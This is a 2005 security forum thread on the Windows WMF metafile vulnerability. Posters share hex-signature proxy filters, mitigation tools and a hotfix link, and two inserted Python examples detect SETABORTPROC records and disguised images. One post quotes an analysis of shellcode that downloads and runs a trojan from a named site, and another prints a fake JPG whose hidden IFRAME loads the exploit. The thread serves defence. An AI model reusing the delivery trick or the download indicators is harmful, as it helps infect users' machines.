New Windows Vulnerability

Discussion in 'other security issues & news' started by TNT, Dec 27, 2005.

Thread Status:
Not open for further replies.
  1. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Something like VMware: www.vmware.com

    OR

    Shadowuser: www.shadowstor.com/products/ShadowUser/

    Both are very effective solutions when it comes to testing and fooling around with dangerous stuff like exploits. ;)
     
  2. Yes indeed. Wise words.
     
  3. shadowsurf

    shadowsurf Guest

  4. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    These are the most up-to-date Proxomitron filters. (You need Proxomitron in order for these filters to work)

    By using these filters, you are able to kill WMF-Exploit Files, regardless of file extension.

    It uses a Hex-matching method to match the identifying 5 bytes and kills the connection immediately upon detection and alerts you of the offending URL.

    The header filter does allow Proxomitron to filter all file extensions, but the Web Page filter is very specific, and it only applies to files, not HTM(L), CSS, or JS files, so there will be little to no false positives.

    You need BOTH filters to be able to kill WMF-Exploit Files.

    Web Page:

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 5
    Match = "[%01][%00][%09][%00][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"

    Header:

    Code:
    [HTTP headers]
    In = FALSE
    Out = TRUE
    Key = "!-|||||||||||| URL: All File Extensions Force Filter {JJoe} (out)"
    URL = "$FILTER(true)"
     
  5. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    from US-Cert:

    Microsoft Windows Metafile handler buffer overflow

     
  6. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Updated the filters again. It should fix the issue where Proxomitron was freezing, and it should remove any false positives.

    Web Page:

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 16
    Match = "[%01][%00][%09][%00][%00][%03][%52][%1F][%00][%00][%06][%00][%3D][%00][%00][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"

    Header:

    Code:
    [HTTP headers]
    In = FALSE
    Out = TRUE
    Key = "Host: All File Extensions Force Filter {JJoe} (out)"
    URL = "$FILTER(true)"
    Match = "\1"
    Replace = "\1"
     
  7. masqueofhastur

    masqueofhastur Registered Member

    Joined:
    Nov 19, 2005
    Posts:
    109
    Good info on Shadowsurfer, handy solution to new exploits.
     
  8. StevieO

    StevieO Guest

    Here's another nice App that goes much further in-depth than the very quick and easy drag-and-drop MiniDumper.

    . . .


    File Analysis by FileAlyzer

    FileAlyzer is a tool to analyze files - the name itself was initially just a typo of FileAnalyzer, but after a few days I decided to keep it. FileAlyzer allows a basic analysis of files (showing file properties and file contents in hex dump form) and is able to interpret common file contents like resources structures (like text, graphics, HTML, media and PE).

    Using FileAlyzer is as simple as viewing the regular properties of a file - just right-click the file you want to analyze and choose Open in FileAlyzer.

    What follows is a list of tabs that are shown in FileAlyzer (depending on the file type you open),

    General

    Version

    Resources

    PE Header

    Sections

    Import/Export table

    Hex dump

    Image preview

    INI contents

    Zip preview

    Media preview

    ID3 tag

    RIFF

    . . .


    It also includes FoldAlyzer in its main folder, which analyzes, yes, folders lol.

    Both are free, along with other Apps from the home of SpyBot Search and Destroy:

    http://www.safer-networking.org/en/filealyzer/


    StevieO
     
  9. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Those using Processguard, set IE to deny always. Processguard can deny the browser from running at all.
     
  10. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Windows WMF Metafile Vulnerability HotFix

    http://www.hexblog.com/2005/12/wmf_vuln.html

    Windows WMF Metafile Vulnerability HotFix

    ~ removed direct download link, CrazyM ~
     
    Last edited by a moderator: Dec 31, 2005
  11. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  12. AntiSerious

    AntiSerious Registered Member

    Joined:
    Jun 28, 2004
    Posts:
    21
    ... I came here to see if anyone had tested using ScriptSentry to block this, by associating the .wmf and .emf files with it instead of whatever default viewer you had previously ... I saw some mention of AnalogX's Script Defender (which I assume works in a similar fashion) but no mention yet of ScriptSentry's effectiveness (or lack of same) ... I've changed the file associations on my XP Pro SP2 box (I run mostly as limited user) but haven't yet added KyeU's new Proxo filters (had some crashes with 4.5) ... if anyone has any feedback I'd like to hear it, thanks ...
     
  13. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  14. AntiSerious

    AntiSerious Registered Member

    Joined:
    Jun 28, 2004
    Posts:
    21
    ... thanks Zhen-Xjell ... I'm just reluctant to apply the workaround and 'break' other functions ... have to think on this some more ...
     
  15. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Here is one:

    Upon accessing the site a WMF file is loaded that executes shellcode which utilizes the recently reported Windows WMF vulnerability. ( see http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=385 ).

    The shellcode calls URLmon.dll to download and execute another file.

    Strings of WMF file showing download site for Trojan Horse. The file pawn00#.exe in turn downloads other executables.

    urlmon.dll
    C:\n.exe
    h p://www.freecat.biz/ /pawn002.exe
    ___________________

    http://www.rsjones.net/img/pawnExe.gif


    As TNT and others point out, the shell code is capable of much more, so with so much uncertainty today, I would think that using some type of virtual environment would be a bottom-line safeguard. And of course, to have a good backup/restore plan.



    ________________
    ~~Be ALERT!!! ~~
     
    Last edited: Jan 1, 2006
  17. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Here seems to be a direct conversion from Snort to Proxomitron :) (It's still weird knowing Proxomitron can match hex in picture files :p )

    Code:
    [Patterns]
    Name = "Windows: Kill WMF-Exploit Files [Kye-U]"
    Active = TRUE
    Limit = 1024
    Match = "$STOP()*[%01-%02][%00][%09][%00]*[%26][%00-%FF][%09][%00]"
    Replace = "\k$ALERT(Infected WMF-Exploit File Killed on:\n\n\u)"
     
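Added example, not from Kye-U's posts and not part of Proxomitron or Snort: a Python checker that does what the hex filters in posts 4, 6 and 17 do. It first applies the raw byte pattern from post 17 (header `01|02 00 09 00` followed by `26 ?? 09 00`), then parses the WMF header and walks the record list to find a META_ESCAPE record (function 0x0626) whose escape number is SETABORTPROC (9), which is the record those four bytes correspond to. The constant names are the Windows Metafile format's own; the function names and the two sample files (built inline with zero filler in place of any payload) are mine.

```python
import re
import struct
from typing import Dict, List

# WMF constants (names as in the Windows Metafile format).
PLACEABLE_KEY = 0x9AC6CDD7   # optional 22-byte "placeable" header before META_HEADER
META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626         # little-endian bytes 26 06
SETABORTPROC = 0x0009        # escape sub-function, little-endian bytes 09 00

# Equivalent of the Proxomitron/Snort pattern in post 17: a META_HEADER
# (Type 1 or 2, HeaderSize 9) followed anywhere by "26 ?? 09 00".
RAW_PATTERN = re.compile(rb"[\x01\x02]\x00\x09\x00.*?\x26.\x09\x00", re.S)


def signature_hit(data: bytes, limit: int = 1024) -> bool:
    """Raw byte-pattern check over the first `limit` bytes, ignoring record structure."""
    return RAW_PATTERN.search(data[:limit]) is not None


def parse_wmf_records(data: bytes) -> List[Dict]:
    """Validate the META_HEADER and return one dict per record up to META_EOF."""
    off = 0
    if len(data) >= 22 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                                   # skip the placeable header
    if len(data) < off + 18:
        raise ValueError("too short for a WMF header")
    mtype, hdr_words, version = struct.unpack_from("<HHH", data, off)
    # Type 1/2, HeaderSize 9 words, Version 0x0100/0x0300: the bytes the filters match
    if mtype not in (1, 2) or hdr_words != 9 or version not in (0x0100, 0x0300):
        raise ValueError("not a WMF header")
    off += 18
    records: List[Dict] = []
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)   # size is in 16-bit words
        if size_words < 3:                         # size dword + function word at minimum
            break
        rec = {"offset": off, "function": func, "size_words": size_words}
        if func == META_ESCAPE and off + 10 <= len(data):
            rec["escape"], rec["escape_bytes"] = struct.unpack_from("<HH", data, off + 6)
        records.append(rec)
        if func == META_EOF:
            break
        off += size_words * 2
    return records


def find_setabortproc(data: bytes) -> List[Dict]:
    """Structural check: META_ESCAPE records whose escape number is SETABORTPROC."""
    try:
        records = parse_wmf_records(data)
    except ValueError:
        return []
    return [r for r in records
            if r["function"] == META_ESCAPE and r.get("escape") == SETABORTPROC]


def _record(func: int, params: bytes = b"") -> bytes:
    body = struct.pack("<H", func) + params
    return struct.pack("<I", (4 + len(body)) // 2) + body   # record size in words


def build_sample(with_abortproc: bool) -> bytes:
    """Constructed test file: one harmless SETMAPMODE record, optionally a
    SETABORTPROC escape carrying zero filler (not a payload), then META_EOF."""
    recs = [_record(META_SETMAPMODE, struct.pack("<H", 1))]
    if with_abortproc:
        filler = b"\x00" * 8
        recs.append(_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, len(filler)) + filler))
    recs.append(_record(META_EOF))
    body = b"".join(recs)
    max_words = max(len(r) // 2 for r in recs)
    # Type=1 (memory), HeaderSize=9, Version=0x0300, Size, NumberOfObjects, MaxRecord, NumberOfMembers
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, 9 + len(body) // 2, 0, max_words, 0)
    return header + body


if __name__ == "__main__":
    for label, sample in (("clean", build_sample(False)), ("escape", build_sample(True))):
        hits = find_setabortproc(sample)
        print(f"{label}: raw pattern={signature_hit(sample)}, "
              f"SETABORTPROC records at={[hex(h['offset']) for h in hits]}")
```

The raw pattern is what a proxy filter or IDS can afford to do on a byte stream; the record walk is what you would run on a quarantined file, because it reports where the escape record sits and how many bytes it carries, and it is not fooled by a `26 xx 09 00` sequence that happens to land inside image data.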
  18. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  19. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
  20. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    Yup :( The way Windows is designed...*sigh*

    I think the only way to match it is by Hex. Antiviruses and Snort do this. Plus my Proxomitron filter :)
     
  21. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  22. Kye-U

    Kye-U Security Expert

    Joined:
    Jun 11, 2004
    Posts:
    481
    I downloaded xmas-2006_FUNNY.jpg, and here is the source code:

    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
    "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    <head>
    <title>Untitled Document</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    </head>
     
    <body>
    <P ALIGN=center><IFRAME SRC="foto.wmf" WIDTH=0 HEIGHT=0></IFRAME></P>
    </body>
    </html>
    Foto.WMF is detected by my Proxomitron filter, and is very similar to the other WMF-Exploit files out there. Only difference is the payload. It's 16kB in size.

    It's NOT a new exploit, as SANS reports. The JPG file just acts as an HTML file, which loads the WMF file automatically using an IFrame. The JPG DOES NOT contain any malicious code. The WMF file does.

    The WMF file is the same as the one found on unionseek and crackz.ws. Same structure, but different payload.
     
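Added example, mine rather than Kye-U's or SANS's: the check the post above implies, classifying an upload by its content instead of its extension and, when an "image" turns out to be HTML, listing the resources an IFRAME or similar tag would pull in. The sample body is a constructed copy of the HTML shown in the post; the function names and the magic-byte table are my own.

```python
import re
from typing import List

# Constructed copy of the "JPG" body shown above (it is plain HTML).
SAMPLE_HTML = b"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
</head>
<body>
<P ALIGN=center><IFRAME SRC="foto.wmf" WIDTH=0 HEIGHT=0></IFRAME></P>
</body>
</html>
"""

_HTML_TAGS = (b"<!doctype", b"<html", b"<head", b"<body", b"<script", b"<iframe")
# Tags that make a browser fetch a second resource, and the attribute naming it.
_LOADER_SRC = re.compile(
    rb"<(?:iframe|img|embed|object)\b[^>]*?\b(?:src|data)\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# Extension -> content type the extension claims.
IMAGE_EXTENSIONS = {"jpg": "jpeg", "jpeg": "jpeg", "gif": "gif", "png": "png",
                    "wmf": "wmf", "emf": "emf"}


def sniff_type(data: bytes) -> str:
    """Classify by leading bytes, ignoring the file name entirely."""
    head = data[:1024]
    if head.startswith(b"\xff\xd8\xff"):
        return "jpeg"
    if head.startswith(b"GIF87a") or head.startswith(b"GIF89a"):
        return "gif"
    if head.startswith(b"\x89PNG\r\n\x1a\n"):
        return "png"
    if len(head) >= 44 and head[40:44] == b" EMF":
        return "emf"
    # WMF: placeable key D7 CD C6 9A, or META_HEADER Type 1/2, HeaderSize 9, Version 0x0100/0x0300
    if head.startswith(b"\xd7\xcd\xc6\x9a") or re.match(rb"[\x01\x02]\x00\x09\x00\x00[\x01\x03]", head):
        return "wmf"
    lowered = head.lstrip(b"\xef\xbb\xbf \t\r\n").lower()   # drop BOM and leading whitespace
    if lowered.startswith(b"<") and any(tag in lowered for tag in _HTML_TAGS):
        return "html"
    return "unknown"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension claims an image format but the content is something else."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = IMAGE_EXTENSIONS.get(ext)
    return expected is not None and sniff_type(data) != expected


def embedded_sources(data: bytes) -> List[str]:
    """Resources an HTML file disguised as an image would load when rendered."""
    if sniff_type(data) != "html":
        return []
    return [m.decode("latin-1") for m in _LOADER_SRC.findall(data)]


if __name__ == "__main__":
    name = "xmas-2006_FUNNY.jpg"
    print(name, "->", sniff_type(SAMPLE_HTML), "mismatch:", extension_mismatch(name, SAMPLE_HTML))
    print("loads:", embedded_sources(SAMPLE_HTML))
```

On an upload path this is the check that stops the trick described in the post: the file is rejected because its bytes are HTML, whatever it is called, and the `foto.wmf` reference tells the analyst which second-stage file to pull for the header check.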
  23. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
  24. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Well, it doesn't get displayed in Firefox or Opera. But of course, the stupid IE does read and execute the script. :rolleyes:
     
  25. Zhen-Xjell

    Zhen-Xjell Security Expert

    Joined:
    Feb 8, 2002
    Posts:
    1,397
    Location:
    Ohio
    Exactly... I had vBulletin and Drupal implement some code to help prevent the thing from being uploaded or attached. I've done the same to my site.
     